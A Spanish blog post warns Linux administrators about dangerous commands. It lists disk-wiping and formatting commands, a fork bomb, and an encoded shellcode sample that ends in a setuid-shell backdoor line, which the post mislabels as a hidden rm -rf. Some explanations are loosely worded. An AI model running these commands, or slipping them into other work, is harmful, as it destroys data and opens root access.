Ir al contenido principal

Comandos peligrosos en Linux

Si eres un fan de linux y estás dando ese paso de junior a senior en el uso de tu sistema operativo,
seguramente te habrás dado cuenta que la consola es una gran ayuda a la hora de administrar nuestro
pc o nuestras aplicaciones ya que dicha consola nos permite ver los logs, matar procesos, controlar espacios, programar tareas, etc.

Para llevar a cabo esas tareas de administración te vales de comandos muy útiles como el grep, top, df, entre otros; pero si tienes las credenciales de acceso como root (que es de suponer) existen otros comandos con los que se debe ser extremadamente cuidadoso, sobre todo en ambientes productivos ya que con la ejecución de éstos te pueden dar una liquidación y vacaciones permanentes por parte de tu empresa.

Te presento entonces algunos de los comandos que debes NO tratar de ejecutar:

1. rm -rf /
Este comando te dá expulsión inmediata de cualquier empresa que tenga en alta estima el activo llamado información digital.

Con esta instrucción estás eliminando TODO en el disco duro incluyendo los archivos en dispositivos de medios extraíbles conectados (excluyendo unidades CD/DVD montadas)

rm --> borra ficheros o directorios
-f --> no pide confirmación
-r o -R --> borra de forma recursiva árboles de directorio
/ --> Directorio raíz (así como para hacernos a la importancia de éste fíjate en la imagen)


2. rm -rf / (oculto)
Este es el equivalente al comando del numeral anterior sólo que en su versión hexadecimal la cual puede ir perfectamente oculta un script de bash o mejor en uno de Python.  Se suelen sufrir los mismos síntomas después de ejecutarse como root (la empresa te regala unas vacaciones permanentes)

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


3. :(){ :|: & };:
Esto es otro script que se utiliza para generar un ataque de denegación de servicio.

4. mkfs.ext4 /dev/sda1
Este comando es el equivalente en Microsoft Windows a Format C:

mkfs.ext4 --> Crea un nuevo systema de archivos tipo ext4
/dev/sda1 --> Especifica la partición primaria en el primer disco que seguramente tendrá datos y estará en uso.

5. ls > /dev/sda
Escribe los datos directamente en el disco duro dañando el sistema de archivos
ls --> Ejecuta el comando ls (listar estructura)
>  --> Envía la salida del comando a la ubicación indicada
/dev/sda --> Escribe la salida del comando directamente en esta ubicación

6. dd if=/dev/random of=/dev/sda
dd --> Copia de bajo nivel desde un lugar a otro
if=/dev/random --> Usa /dev/random (data aleatoria) como la entrada

of=/dev/sda --> Salida para el primer disco duro, sustituyendo el sistema de archivos con datos al azar.

7. mv ~ /dev/null
Mueve su directorio personal (home) a un lugar inexistente
mv --> Comando para mover archivos y/o directorios
~ --> Representa la entrada a su directorio personal
/dev/null --> Mueve su directorio personal a /dev/null, perdiendo todos sus archivos y borrándolos de la copia original

8. cd / ; find -iname init -exec rm -rf {} \;
Este comando borrará todos los archivos que contenga la palabra init.
init --> Arranque del sistem que llama a otros scripts para definir el runlevel con se iniciará el sistem (0 para detener el sistema, 5 entorno gráfico, 6 para reiniciar)
find --> comando para buscar archivos

Comentarios

Entradas populares de este blog

Tutorial: Introducción a PyTorch - Primeros Pasos en Deep Learning

  Muy interesado en este mundo de todo lo relacionado con inteligencia artificial hoy quiero que aprendamos juntos a utilizar PyTorch, una de las librerías más populares para Deep Learning, con ejemplos prácticos. En este tutorial iremos (porque yo también estoy aprendiendo) paso a paso para comenzar con PyTorch y construir nuestros primeros modelos de redes neuronales.  Bienvenido (a)!. El Deep Learning es una rama fascinante de la inteligencia artificial que ha logrado resultados impresionantes en una variedad de problemas complejos. En este tutorial, aprenderás a utilizar PyTorch, una potente librería de Python desarrollada por Facebook, para construir y entrenar modelos de deep learning desde cero. ¿Qué es PyTorch? PyTorch es una librería de Python para computación en Deep Learning que permite tanto entrenar modelos como usarlos para inferencia. Es conocida por su flexibilidad y facilidad de uso, lo que la convierte en una excelente opción tanto para investigadores como pa...

Las 10 Aplicaciones Más Descargadas en Google Play Store y Apple App Store en 2024

  En el mundo digital actual, las aplicaciones móviles juegan un papel crucial en nuestras vidas diarias. Con millones de aplicaciones disponibles, solo unas pocas logran destacar y acumular millones de descargas. En este artículo, exploramos las aplicaciones más descargadas en Google Play Store y Apple App Store hasta la primera mitad de 2024. 1. Instagram Instagram sigue siendo una de las aplicaciones más populares a nivel mundial. Con 696 millones de descargas en Google Play Store, esta plataforma de redes sociales permite a los usuarios compartir fotos y videos, interactuar con amigos y seguir a celebridades. 2. TikTok TikTok, la aplicación de videos cortos, ha revolucionado la forma en que consumimos contenido. Con 654 millones de descargas en Google Play Store, se mantiene como una de las favoritas entre los usuarios jóvenes y creativos. 3. Facebook Facebook, la red social pionera, continúa siendo relevante con 553 millones de descargas . La plataforma ofrece una variedad d...

Inyección SQL: Qué es y Cómo prevenirla

La inyección SQL es una de las vulnerabilidades de seguridad más peligrosas y comunes en aplicaciones web. Permite a los atacantes interferir con las consultas que una aplicación hace a su base de datos, lo que puede llevar a la exposición de datos sensibles y control total sobre la base de datos afectada. En este artículo, exploraremos qué es la inyección SQL, las nuevas técnicas que se están utilizando y cómo puedes proteger tu aplicación contra este tipo de ataques. ¿Qué es la Inyección SQL? La inyección SQL (SQL Injection) ocurre cuando un atacante inserta código SQL malicioso en un campo de entrada, el cual es luego ejecutado por la base de datos. Este tipo de ataque explota la falta de sanitización de entradas y permite a los atacantes acceder, modificar o eliminar datos de la base de datos. Nuevas Técnicas de Inyección SQL Con el tiempo, los atacantes han desarrollado nuevas técnicas para explotar las vulnerabilidades de inyección SQL. Algunas de las más recientes incluyen: Inye...